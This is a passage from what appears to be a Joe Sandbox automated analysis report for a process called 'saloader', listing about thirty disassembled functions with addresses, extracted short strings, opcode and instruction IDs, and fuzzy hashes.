                                                                                          • Source File: 00000000.00000002.1980903398.00007FFAAC610000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC610000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7ffaac610000_saloader.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: 8\9O$69O
                                                                                          • API String ID: 0-1095183992
                                                                                          • Opcode ID: 251fb6417f2f709549fb18ced3807c60a0766984f7f39cefe32d36ea68bfe6e9
                                                                                          • Instruction ID: 896ab5759b42c448be326043aed2fa00c246e8bad4e4502f09495c8a87628cf5
                                                                                          • Opcode Fuzzy Hash: 251fb6417f2f709549fb18ced3807c60a0766984f7f39cefe32d36ea68bfe6e9
                                                                                          • Instruction Fuzzy Hash: 8401C421A0D7474FE7869B3894556647BE0EF46350F0400BBD84DCB1E3DD6C9DC58341
                                                                                          Function 00007FFAAC613E80 Relevance: 2.6, Strings: 2, Instructions: 52COMMON
                                                                                          Download Yara Rule
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1980903398.00007FFAAC610000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC610000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7ffaac610000_saloader.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: 8\9O$69O
                                                                                          • API String ID: 0-1095183992
                                                                                          • Opcode ID: d68c5978871cac002c5afef24192a13b1ee4fd05a77f4e6c3b697eb646f6a878
                                                                                          • Instruction ID: 7b9879b9e51dfa93aa80df598ecb405e09e21fc1d3ce7db66bef7020a427e111
                                                                                          • Opcode Fuzzy Hash: d68c5978871cac002c5afef24192a13b1ee4fd05a77f4e6c3b697eb646f6a878
                                                                                          • Instruction Fuzzy Hash: 5401B121A0DA0A4FF786AA3C9855A647BE0EB46350F0401BBE80ECB1E3ED589C864381
                                                                                          Function 00007FFAAC629F98 Relevance: 1.9, Strings: 1, Instructions: 607COMMON
                                                                                          Download Yara Rule
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1980903398.00007FFAAC610000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC610000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7ffaac610000_saloader.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: x69O
                                                                                          • API String ID: 0-1204690934
                                                                                          • Opcode ID: 9eacedcda9f9e1bfae032e2da88aa9ba3e2b72170d31955818157d4ba9318466
                                                                                          • Instruction ID: 1fc74e45ceea14da56d484c2af510131160eb86f80d19dbbefcdcc7c13f97d77
                                                                                          • Opcode Fuzzy Hash: 9eacedcda9f9e1bfae032e2da88aa9ba3e2b72170d31955818157d4ba9318466
                                                                                          • Instruction Fuzzy Hash: 9812683061C9498FEB69DB1CE495BB933D1EF99300F1490BEE44EC72A7CE24EC458685
                                                                                          Function 00007FFAAC63D748 Relevance: 1.9, Strings: 1, Instructions: 602COMMON
                                                                                          Download Yara Rule
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1980903398.00007FFAAC610000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC610000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7ffaac610000_saloader.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: b4
                                                                                          • API String ID: 0-3371602342
                                                                                          • Opcode ID: c197c76e45b3024ff8f8b399b8204f79f643eaebb865440988114a7d401e0e51
                                                                                          • Instruction ID: 37e3204a76bbe1d316c64ce12fb637762d7bb758d30c216863a35c504e366cd1
                                                                                          • Opcode Fuzzy Hash: c197c76e45b3024ff8f8b399b8204f79f643eaebb865440988114a7d401e0e51
                                                                                          • Instruction Fuzzy Hash: A212133191DB4A8FE76ADB28C485571B7E0FF56300B24967DD08EC7692DA24F84AC7C1
                                                                                          Function 00007FFAAC7DDB18 Relevance: 1.7, Strings: 1, Instructions: 454COMMON
                                                                                          Download Yara Rule
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1993228001.00007FFAAC7D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC7D0000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7ffaac7d0000_saloader.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: 6
                                                                                          • API String ID: 0-1452363761
                                                                                          • Opcode ID: 0aa8b53b6e82db5a83351e2dd8f872ff10871afaa54c36ce098a869e53274ac1
                                                                                          • Instruction ID: 1165cdf29bea95b793c05198168c09e4ff402f9f540d11beae8a5ac61e19309d
                                                                                          • Opcode Fuzzy Hash: 0aa8b53b6e82db5a83351e2dd8f872ff10871afaa54c36ce098a869e53274ac1
                                                                                          • Instruction Fuzzy Hash: 2CE18670A18A0ECFEB99DF58C491BA977F1FF69300F14816AD41DC7296DA34E846CB90
                                                                                          Function 00007FFAAC622DFE Relevance: 1.7, Strings: 1, Instructions: 449COMMON
                                                                                          Download Yara Rule
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1980903398.00007FFAAC610000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC610000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7ffaac610000_saloader.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: H
                                                                                          • API String ID: 0-2852464175
                                                                                          • Opcode ID: 33de6db14f5b3bf63589e245074ace491e5d9acb7bc62159d9a32917db2a3335
                                                                                          • Instruction ID: 1e28f3d84d4bf4d2b64f6c21866a82d2208a6b314d4ba2ed651496f82c200c57
                                                                                          • Opcode Fuzzy Hash: 33de6db14f5b3bf63589e245074ace491e5d9acb7bc62159d9a32917db2a3335
                                                                                          • Instruction Fuzzy Hash: DAF15474A18A4E8FDFC9EF18C494AA973E2FF59310B5055A9D41EC7296DB34EC42CB80
                                                                                          Function 00007FFAAC653730 Relevance: 1.7, Strings: 1, Instructions: 414COMMON
                                                                                          Download Yara Rule
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1980903398.00007FFAAC610000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC610000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7ffaac610000_saloader.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: x69O
                                                                                          • API String ID: 0-1204690934
                                                                                          • Opcode ID: 108b9afae1c5e757d81b8fce4500c2c949d09ed583a6551d526d7164f0c4bcf9
                                                                                          • Instruction ID: 52b5b9b910c9b9c2f82cad5d8060df07d35c6b1d8f38956498bf7a02928613af
                                                                                          • Opcode Fuzzy Hash: 108b9afae1c5e757d81b8fce4500c2c949d09ed583a6551d526d7164f0c4bcf9
                                                                                          • Instruction Fuzzy Hash: 06C1F530A1DA4A8FF75AEB2C8845A7477D1FF56B00F2461BDD04DC71A6DE29EC458381
                                                                                          Function 00007FFAAC7E2139 Relevance: 1.6, Strings: 1, Instructions: 380COMMON
                                                                                          Download Yara Rule
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1993228001.00007FFAAC7D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC7D0000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7ffaac7d0000_saloader.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: "9
                                                                                          • API String ID: 0-1061052283
                                                                                          • Opcode ID: 5da7881d6eb1ed82d68eaa573d5622822c653dae5e771e4c74666fd41082a009
                                                                                          • Instruction ID: 167caca73789176049a05649b983aeaef1978512f326e4f5e3d541d5e0a81d7d
                                                                                          • Opcode Fuzzy Hash: 5da7881d6eb1ed82d68eaa573d5622822c653dae5e771e4c74666fd41082a009
                                                                                          • Instruction Fuzzy Hash: 7DB15962A0DA8A8FF799977C94556B43BE1EF9B310F0941BAD04DC7193DE18EC4A83C1
                                                                                          Function 00007FFAAC7DDF2D Relevance: 1.6, Strings: 1, Instructions: 364COMMON
                                                                                          Download Yara Rule
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1993228001.00007FFAAC7D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC7D0000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7ffaac7d0000_saloader.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: x69O
                                                                                          • API String ID: 0-1204690934
                                                                                          • Opcode ID: 753a91d3e0ca3bfa374a5f6f7aa4395d650776fbc3201a433129ca06cafb43e4
                                                                                          • Instruction ID: 6f9fbfcef51c7c92f25c704e3d88b113fde2d991242c9bb9c6c115e39f63b4d2
                                                                                          • Opcode Fuzzy Hash: 753a91d3e0ca3bfa374a5f6f7aa4395d650776fbc3201a433129ca06cafb43e4
                                                                                          • Instruction Fuzzy Hash: 38B1257190D78A8FE70ADB24C8456A57BF0EF47320F1841AFD45DCB1A3DA29A846CB91
                                                                                          Function 00007FFAAC613EF9 Relevance: 1.6, Strings: 1, Instructions: 363COMMON
                                                                                          Download Yara Rule
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1980903398.00007FFAAC610000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC610000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7ffaac610000_saloader.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: 69O
                                                                                          • API String ID: 0-3814607343
                                                                                          • Opcode ID: f35c7c16fd28759ef30632c2138e230f703289e542b7163520447bfc2941bdb4
                                                                                          • Instruction ID: 3c10e76bb41a45d62b5ce020c7fdc00640ba7ee9b6014a3e2f63b9dcc879f86a
                                                                                          • Opcode Fuzzy Hash: f35c7c16fd28759ef30632c2138e230f703289e542b7163520447bfc2941bdb4
                                                                                          • Instruction Fuzzy Hash: D3C13771A0968A8FFB95DF28C8556B977E1FF5A312F04517AD40DC72D2DE28E80AC780
                                                                                          Function 00007FFAAC629F30 Relevance: 1.6, Strings: 1, Instructions: 349COMMON
                                                                                          Download Yara Rule
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1980903398.00007FFAAC610000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC610000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7ffaac610000_saloader.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: /
                                                                                          • API String ID: 0-1686368129
                                                                                          • Opcode ID: 9828fba80c6d7a32038e65f248ab32ef92ad4feb9a5a4a76ffa8d528fcb56a51
                                                                                          • Instruction ID: f463ac91532b8e512ecc4d7e71afe47363cca2df52440898ece66711f107397b
                                                                                          • Opcode Fuzzy Hash: 9828fba80c6d7a32038e65f248ab32ef92ad4feb9a5a4a76ffa8d528fcb56a51
                                                                                          • Instruction Fuzzy Hash: 08B19371A18A4DCFEF95EF2CD994EA977E1FF59300B0411A5E40ED72A1DA24EC45CB80
                                                                                          Function 00007FFAAC6255EF Relevance: 1.6, Strings: 1, Instructions: 340COMMON
                                                                                          Download Yara Rule
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1980903398.00007FFAAC610000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC610000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7ffaac610000_saloader.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: x69O
                                                                                          • API String ID: 0-1204690934
                                                                                          • Opcode ID: 7b84f315a82660a4da05771b0bc8b6d9e18b2d11479977a9ed09c6d0289dcad0
                                                                                          • Instruction ID: 4a02b7a0b675b5742cb86d512f43709789b44e85194a919ac497e15b0f38dfb3
                                                                                          • Opcode Fuzzy Hash: 7b84f315a82660a4da05771b0bc8b6d9e18b2d11479977a9ed09c6d0289dcad0
                                                                                          • Instruction Fuzzy Hash: 78B1C270A19A0DCFEB89EF18C455A6877E1FF5A300B1451ADE44EC72A2DF21EC46CB81
                                                                                          Function 00007FFAAC621D88 Relevance: 1.6, Strings: 1, Instructions: 320COMMON
                                                                                          Download Yara Rule
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1980903398.00007FFAAC610000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC610000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7ffaac610000_saloader.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: r6
                                                                                          • API String ID: 0-2984296541
                                                                                          • Opcode ID: 97dca7b08a07571760a740b4059d61ba55b9cf1d564389b2b0538ad4a6fd48a7
                                                                                          • Instruction ID: b0c323f614b35d121ee3a151972851909fd3fee3f8fe9ffa475ea1749ef5a056
                                                                                          • Opcode Fuzzy Hash: 97dca7b08a07571760a740b4059d61ba55b9cf1d564389b2b0538ad4a6fd48a7
                                                                                          • Instruction Fuzzy Hash: 2691C372E0891D8FFBAAE76894156FD77D2FF95310F00657AD40ED3291DE28A8468780
                                                                                          Function 00007FFAAC610E40 Relevance: 1.5, Strings: 1, Instructions: 283COMMON
                                                                                          Download Yara Rule
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1980903398.00007FFAAC610000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC610000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7ffaac610000_saloader.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: Pc9O
                                                                                          • API String ID: 0-1212118140
                                                                                          • Opcode ID: 7ad2806599c6d925316b8ea80eac5ebb8429a1d05c669f6ffcdb166fee88a296
                                                                                          • Instruction ID: 602c922bd71e860fbf8656929430156501b95fb5f1e7634920497eff00885f24
                                                                                          • Opcode Fuzzy Hash: 7ad2806599c6d925316b8ea80eac5ebb8429a1d05c669f6ffcdb166fee88a296
                                                                                          • Instruction Fuzzy Hash: 4681F731A08A4A8FE799EB6CD4456B9B7E1FB99351F04827ED00EC3291DF24E84687C1
                                                                                          Function 00007FFAAC629E9D Relevance: 1.5, Strings: 1, Instructions: 274COMMON
                                                                                          Download Yara Rule
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1980903398.00007FFAAC610000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC610000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7ffaac610000_saloader.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: x69O
                                                                                          • API String ID: 0-1204690934
                                                                                          • Opcode ID: 11553fb133bbe96dccc2964c526ebb42a589134890d53093d891dc20c21fbffa
                                                                                          • Instruction ID: c51d1e131d7d4ded1b3d5fc930f93a5c3ae8821dfe97c5fca3bc28d4ba74e274
                                                                                          • Opcode Fuzzy Hash: 11553fb133bbe96dccc2964c526ebb42a589134890d53093d891dc20c21fbffa
                                                                                          • Instruction Fuzzy Hash: AC718070A19A0E8FEF99DB2CD445A7973E1FF9A310F20617EE44EC7251DA24EC468781
                                                                                          Function 00007FFAAC7DEA08 Relevance: 1.5, Strings: 1, Instructions: 272COMMON
                                                                                          Download Yara Rule
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1993228001.00007FFAAC7D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC7D0000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7ffaac7d0000_saloader.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: /
                                                                                          • API String ID: 0-1686368129
                                                                                          • Opcode ID: 7d61149f8a8788b5e47e7b0883d0737138689a9bc0a1d86c0c9049e3b37a93cb
                                                                                          • Instruction ID: 16dd6c535402691281d616f67e035cc14fef6f88dfa0a1c11eeb91d1dd526272
                                                                                          • Opcode Fuzzy Hash: 7d61149f8a8788b5e47e7b0883d0737138689a9bc0a1d86c0c9049e3b37a93cb
                                                                                          • Instruction Fuzzy Hash: 7881F731E1DA0A8FE796EB3888556B97BE1FF9A310F5441BAD04EC3293DE24DC458780
                                                                                          Function 00007FFAAC7DEA40 Relevance: 1.5, Strings: 1, Instructions: 243COMMON
                                                                                          Download Yara Rule
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1993228001.00007FFAAC7D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC7D0000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7ffaac7d0000_saloader.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: /
                                                                                          • API String ID: 0-1686368129
                                                                                          • Opcode ID: 4c6f3cfef205ddfce075c0af2abf45c8bbcbbf2edfbabac37435c106996830a9
                                                                                          • Instruction ID: 83af9a4cdadf296f00acc473b3b786f5e8f8a1a2504704faf4c0eb22354f4be4
                                                                                          • Opcode Fuzzy Hash: 4c6f3cfef205ddfce075c0af2abf45c8bbcbbf2edfbabac37435c106996830a9
                                                                                          • Instruction Fuzzy Hash: FD71E831E1DA098FE79ADB6888557B97BE1FF99310F4441BAE04EC3292DE24DC458781
                                                                                          Function 00007FFAAC626789 Relevance: 1.5, Strings: 1, Instructions: 242COMMON
                                                                                          Download Yara Rule
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1980903398.00007FFAAC610000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC610000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7ffaac610000_saloader.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: `9O
                                                                                          • API String ID: 0-2339314669
                                                                                          • Opcode ID: 0358b58aed81bcc319c74c49605fdeef45d844b86e2b7b1d0dcdfa60186f776b
                                                                                          • Instruction ID: e6fd69c73dca17f5664d7c8edd992754188e24cd529c17cd652a904f86d28b66
                                                                                          • Opcode Fuzzy Hash: 0358b58aed81bcc319c74c49605fdeef45d844b86e2b7b1d0dcdfa60186f776b
                                                                                          • Instruction Fuzzy Hash: 7671D12AC0E68A8FF766D73458155A4BFE0EF56310F0861FAD48DC7193E91CD91E8392
                                                                                          Function 00007FFAAC660D08 Relevance: 1.5, Strings: 1, Instructions: 239COMMON
                                                                                          Download Yara Rule
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1980903398.00007FFAAC610000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC610000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7ffaac610000_saloader.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: p:O
                                                                                          • API String ID: 0-2254489207
                                                                                          • Opcode ID: bf7d7af7a8cc4aeb7b125fad82985d45eb121416a6c6e52e4c6457b180805076
                                                                                          • Instruction ID: 0edd55cbdf13f27bdd82fc77ffb39f57dde0aab0e08dedcde34a29f0cdfefe0e
                                                                                          • Opcode Fuzzy Hash: bf7d7af7a8cc4aeb7b125fad82985d45eb121416a6c6e52e4c6457b180805076
                                                                                          • Instruction Fuzzy Hash: E07104A192DB868FE759D7388049AB6B7E1FF99310F04857ED04FC3592DE24E8068382
                                                                                          Function 00007FFAAC7DEA50 Relevance: 1.5, Strings: 1, Instructions: 235COMMON
                                                                                          Download Yara Rule
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1993228001.00007FFAAC7D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC7D0000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7ffaac7d0000_saloader.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: /
                                                                                          • API String ID: 0-1686368129
                                                                                          • Opcode ID: 7576fb2383124162ac5935a53452901f7861a314f2d9934d7eaca5cede99fc57
                                                                                          • Instruction ID: 62481563ba757d6653815ca28e1b709adc96e675043caba6490e381926b9e204
                                                                                          • Opcode Fuzzy Hash: 7576fb2383124162ac5935a53452901f7861a314f2d9934d7eaca5cede99fc57
                                                                                          • Instruction Fuzzy Hash: ED61F631E19A098FE79AEB2C88557B97BE1FF99300F4441BAE00EC32D2DE24DC458781
                                                                                          Function 00007FFAAC7DAC8C Relevance: 1.4, Strings: 1, Instructions: 187COMMON
                                                                                          Download Yara Rule
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1993228001.00007FFAAC7D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC7D0000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7ffaac7d0000_saloader.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: (%
                                                                                          • API String ID: 0-1001719454
                                                                                          • Opcode ID: f4ae853d945c573b3ea37fdeaac1a0cba8ea2bf879872a854bf3dd9a54ef75da
                                                                                          • Instruction ID: e10c571852963b2be7af5ab45e0d3d6083005f300d6e8b7ade2345a706de1dae
                                                                                          • Opcode Fuzzy Hash: f4ae853d945c573b3ea37fdeaac1a0cba8ea2bf879872a854bf3dd9a54ef75da
                                                                                          • Instruction Fuzzy Hash: 8C51D871A18A4E8FEB85EF28C485AAA77F1FF59310F0445AAD40DC7295DE34E845CBC0
                                                                                          Function 00007FFAAC7DACB9 Relevance: 1.4, Strings: 1, Instructions: 185COMMON
                                                                                          Download Yara Rule
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1993228001.00007FFAAC7D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC7D0000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7ffaac7d0000_saloader.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: (%
                                                                                          • API String ID: 0-1001719454
                                                                                          • Opcode ID: e4a71d6110429a08fcaba5a3da9825fbabe2939ce06e6c72024c40095838d2e5
                                                                                          • Instruction ID: e1da68cf0d002eef9bc9f27fe9d29ee64e2d8a0a9e62ed67063f707d71d11934
                                                                                          • Opcode Fuzzy Hash: e4a71d6110429a08fcaba5a3da9825fbabe2939ce06e6c72024c40095838d2e5
                                                                                          • Instruction Fuzzy Hash: 6651DA70919A8E8FEB85DF28C495AA677F1FF55310F0485AAD40DC7195CE34E846CB80
                                                                                          Function 00007FFAAC629FB0 Relevance: 1.4, Strings: 1, Instructions: 180COMMON
                                                                                          Download Yara Rule
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1980903398.00007FFAAC610000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC610000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7ffaac610000_saloader.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: x69O
                                                                                          • API String ID: 0-1204690934
                                                                                          • Opcode ID: b77ec2fe87214fe28fbbb1ef994f86049c3aae37c3b924a138ec78c579e38f22
                                                                                          • Instruction ID: 2903a28d42c427b340f6d27ad6bedf3e0a7867b4e2b4e48213967065aba79f85
                                                                                          • Opcode Fuzzy Hash: b77ec2fe87214fe28fbbb1ef994f86049c3aae37c3b924a138ec78c579e38f22
                                                                                          • Instruction Fuzzy Hash: A941D421A0EA4E8FFF96E71C845967177D1EF6A310B2460BED44EC7292DC19EC8583C1
                                                                                          Function 00007FFAAC629F0D Relevance: 1.4, Strings: 1, Instructions: 136COMMON
                                                                                          Download Yara Rule
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1980903398.00007FFAAC610000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC610000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7ffaac610000_saloader.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: p:O
                                                                                          • API String ID: 0-2254489207
                                                                                          • Opcode ID: 9da9700f60425bad89c36f863dec065ef867107609613aef931876cee95522a6
                                                                                          • Instruction ID: 669cca0db854cdd4f7d04d7d204cb20502dde0a88ebeba5cab258ccde1c8fec5
                                                                                          • Opcode Fuzzy Hash: 9da9700f60425bad89c36f863dec065ef867107609613aef931876cee95522a6
                                                                                          • Instruction Fuzzy Hash: 1D31083161D9098FE789E72CD555AB977D1FF8A360B15617AE44EC3253DD24EC8283C0
                                                                                          Function 00007FFAAC62BF8D Relevance: 1.4, Strings: 1, Instructions: 114COMMON
                                                                                          Download Yara Rule
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1980903398.00007FFAAC610000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC610000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7ffaac610000_saloader.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: KL
                                                                                          • API String ID: 0-2295730153
                                                                                          • Opcode ID: 6445e0c596c5ee0b24c13aa6c6193eb50467b95c34b4857fc513fe22886ac357
                                                                                          • Instruction ID: 525e25bf8eeffe1182fb9a74ba4a66877a249186d947030b1589a94205544434
                                                                                          • Opcode Fuzzy Hash: 6445e0c596c5ee0b24c13aa6c6193eb50467b95c34b4857fc513fe22886ac357
                                                                                          • Instruction Fuzzy Hash: 7B31A47152C9494FEB4DEB28D8869F937D0FBA9310F10502EF44FC3697DD24E8464285
                                                                                          Function 00007FFAAC7DE0B8 Relevance: 1.4, Strings: 1, Instructions: 107COMMON
                                                                                          Download Yara Rule
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1993228001.00007FFAAC7D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC7D0000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7ffaac7d0000_saloader.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: x69O
                                                                                          • API String ID: 0-1204690934
                                                                                          • Opcode ID: 3b74aa5a291964f3785b17a54510ab7e97dc9228efde499e9e6d78c22fc63b43
                                                                                          • Instruction ID: 6035f396578ae122c470a402a2307da5f9b085b53fffe8f3a35a330a860f9fde
                                                                                          • Opcode Fuzzy Hash: 3b74aa5a291964f3785b17a54510ab7e97dc9228efde499e9e6d78c22fc63b43
                                                                                          • Instruction Fuzzy Hash: D231D231E08A4E8FDB86DF28C4006AAB7F1FF46350F4441BAD81DD7252CA38AC458BD0
                                                                                          Function 00007FFAAC615ECE Relevance: 1.3, Strings: 1, Instructions: 88COMMON
                                                                                          Download Yara Rule
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1980903398.00007FFAAC610000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC610000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7ffaac610000_saloader.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: 8!
                                                                                          • API String ID: 0-3454247621
                                                                                          • Opcode ID: 980cdffe7484f5251d4578d937d07fc0ed83646008c1715b2341993a57b13dc7
                                                                                          • Instruction ID: 4e3d3cfe12b66c8471c7e2a28e14e9aeae9dd22e1d05d495b9068b4aeb19dd6c
                                                                                          • Opcode Fuzzy Hash: 980cdffe7484f5251d4578d937d07fc0ed83646008c1715b2341993a57b13dc7
                                                                                          • Instruction Fuzzy Hash: 8D218362B1894A8FEF84EB7C9455BB9B7D1EB98311B0481BAE10EC32D7DD18DC064781
                                                                                          Function 00007FFAAC616EFA Relevance: 1.3, Strings: 1, Instructions: 81COMMON
                                                                                          Download Yara Rule
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.1980903398.00007FFAAC610000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFAAC610000, based on PE: false
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_7ffaac610000_saloader.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: [9O
                                                                                          • API String ID: 0-158884040
                                                                                          • Opcode ID: f29cd29bafde8589a1463ceaaacd6bd767289b4c04c5518256c0172234eb305e
                                                                                          • Instruction ID: 29eac8f8caff4eb38f3201adca687220000f5ea580aa89f35e6e01e4d81b9755
                                                                                          • Opcode Fuzzy Hash: f29cd29bafde8589a1463ceaaacd6bd767289b4c04c5518256c0172234eb305e
